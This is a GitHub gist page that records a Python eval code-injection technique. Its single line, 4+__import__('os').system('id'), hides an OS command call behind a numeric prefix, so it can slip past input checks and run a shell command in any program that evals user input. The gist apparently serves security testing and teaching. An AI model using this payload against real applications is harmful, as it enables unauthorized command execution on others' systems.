Skip to content

Instantly share code, notes, and snippets.

@shollingsworth
Created February 10, 2022 01:49
Show Gist options
  • Save shollingsworth/e4c985cf32495e1340f5ec38d0cc9a70 to your computer and use it in GitHub Desktop.
Save shollingsworth/e4c985cf32495e1340f5ec38d0cc9a70 to your computer and use it in GitHub Desktop.
python code injection technique eval execution
# example with number prefix
4+__import__('os').system('id')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment